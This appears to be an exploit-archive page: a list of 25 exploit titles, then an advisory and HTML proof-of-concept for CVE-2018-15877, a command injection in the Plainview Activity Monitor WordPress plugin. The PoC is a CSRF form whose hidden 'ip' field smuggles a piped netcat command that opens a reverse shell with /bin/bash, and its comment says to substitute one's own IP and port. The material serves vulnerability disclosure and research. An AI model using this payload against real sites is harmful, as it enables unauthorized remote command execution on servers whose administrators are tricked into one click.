18e2848633
25 changes to exploits/shellcodes Firefox 55.0.3 - Denial of Service (PoC) Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC) Libpango 1.40.8 - Denial of Service (PoC) Adobe Flash - AVC Processing Out-of-Bounds Read Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP) CuteFTP 5.0 - Buffer Overflow Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit) OpenSSH 7.7 - Username Enumeration OpenSSH 2.3 < 7.7 - Username Enumeration Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Node.JS - 'node-serialize' Remote Code Execution Electron WebPreferences - Remote Code Execution HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit) Auditor Website 2.0.1 - Cross-Site Scripting Basic B2B Script 2.0.0 - Cross-Site Scripting Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting Sentrifugo HRMS 3.2 - 'deptid' SQL Injection WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin) RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin) LiteCart 2.1.2 - Arbitrary File Upload Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection Responsive FileManager < 9.13.4 - Directory Traversal WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection
56 lines
No EOL
2.1 KiB
HTML
56 lines
No EOL
2.1 KiB
HTML
<!--
|
|
About:
|
|
===========
|
|
Component: Plainview Activity Monitor (Wordpress plugin)
|
|
Vulnerable version: 20161228 and possibly prior
|
|
Fixed version: 20180826
|
|
CVE-ID: CVE-2018-15877
|
|
CWE-ID: CWE-78
|
|
Author:
|
|
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
|
|
|
|
Timeline:
|
|
===========
|
|
- 2018/08/25: Vulnerability found
|
|
- 2018/08/25: CVE-ID request
|
|
- 2018/08/26: Reported to developer
|
|
- 2018/08/26: Fixed version
|
|
- 2018/08/26: Advisory published on GitHub
|
|
- 2018/08/26: Advisory sent to bugtraq mailing list
|
|
|
|
Description:
|
|
===========
|
|
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
|
|
command injection which allows an attacker to remotely execute
|
|
commands on underlying system. Application passes unsafe user supplied
|
|
data to ip parameter into activities_overview.php.
|
|
Privileges are required in order to exploit this vulnerability, but
|
|
this plugin version is also vulnerable to CSRF attack and Reflected
|
|
XSS. Combined, these three vulnerabilities can lead to Remote Command
|
|
Execution just with an admin click on a malicious link.
|
|
|
|
References:
|
|
===========
|
|
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
|
|
|
|
PoC:
|
|
-->
|
|
|
|
<html>
|
|
<!-- Wordpress Plainview Activity Monitor RCE
|
|
[+] Version: 20161228 and possibly prior
|
|
[+] Description: Combine OS Commanding and CSRF to get reverse shell
|
|
[+] Author: LydA(c)ric LEFEBVRE
|
|
[+] CVE-ID: CVE-2018-15877
|
|
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
|
|
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
|
|
-->
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
|
|
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
|
|
<input type="hidden" name="lookup" value="Lookup" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |